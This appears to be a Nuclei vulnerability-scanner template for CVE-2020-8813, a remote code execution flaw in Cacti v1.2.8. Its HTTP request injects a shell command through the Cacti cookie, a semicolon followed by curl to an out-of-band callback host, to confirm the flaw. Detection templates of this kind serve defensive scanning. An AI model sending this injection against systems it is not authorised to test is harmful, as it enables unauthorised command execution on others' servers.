id: CVE-2020-8813 info: name: Cacti v1.2.8 - Remote Code Execution author: gy741 severity: high description: Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if "Guest Realtime Graphs" privileges are enabled. remediation: | Upgrade to a patched version of Cacti v1.2.9 or later to mitigate this vulnerability. reference: - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ - https://github.com/Cacti/cacti/releases - https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129 - https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view - https://nvd.nist.gov/vuln/detail/CVE-2020-8813 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-8813 cwe-id: CWE-78 epss-score: 0.94641 epss-percentile: 0.99009 cpe: cpe:2.3:a:cacti:cacti:1.2.8:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cacti product: cacti tags: cve,cve2020,cacti,rce,oast http: - raw: - | GET /graph_realtime.php?action=init HTTP/1.1 Host: {{Hostname}} Cookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}} matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - type: word part: interactsh_request words: - "User-Agent: curl" # digest: 4a0a0047304502206977f14b82a9232ad9a17366ff81b2bd12bd9bacc2f18321e11ca0381e30335a02210080f0e899c1397ce897f0a28afc38e5be3d41d8bec06511010cb23e64e842849c:922c64590222798bb761d5b6d8e72950